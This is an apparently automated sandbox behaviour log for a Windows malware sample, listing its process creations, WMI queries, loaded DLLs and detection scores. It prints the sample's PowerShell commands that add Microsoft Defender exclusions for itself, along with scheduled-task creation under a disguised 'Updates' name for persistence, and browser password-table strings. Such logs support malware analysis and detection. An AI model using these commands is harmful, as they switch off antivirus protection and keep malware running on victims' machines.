                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeMutant created: \Sessions\1\BaseNamedObjects\eoQOydmdtHej
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC18A.tmpJump to behavior
                  Source: nzLoHpgAln.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: nzLoHpgAln.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: tmp446E.tmp.14.dr, tmp4490.tmp.14.dr, tmpAAF.tmp.14.dr, tmp446F.tmp.14.dr, tmpE705.tmp.8.dr, tmp447F.tmp.14.dr, tmpE728.tmp.8.dr, tmpE6F4.tmp.8.dr, tmpE717.tmp.8.dr, tmpE716.tmp.8.dr, tmpA9F.tmp.14.dr, tmpE704.tmp.8.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: nzLoHpgAln.exeReversingLabs: Detection: 63%
                  Source: nzLoHpgAln.exeVirustotal: Detection: 56%
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeFile read: C:\Users\user\Desktop\nzLoHpgAln.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\nzLoHpgAln.exe "C:\Users\user\Desktop\nzLoHpgAln.exe"
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Users\user\Desktop\nzLoHpgAln.exe "C:\Users\user\Desktop\nzLoHpgAln.exe"
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpE7EE.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess created: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeProcess created: C:\Users\user\Desktop\nzLoHpgAln.exe "C:\Users\user\Desktop\nzLoHpgAln.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpE7EE.tmp"
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeProcess created: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: iconcodecservice.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
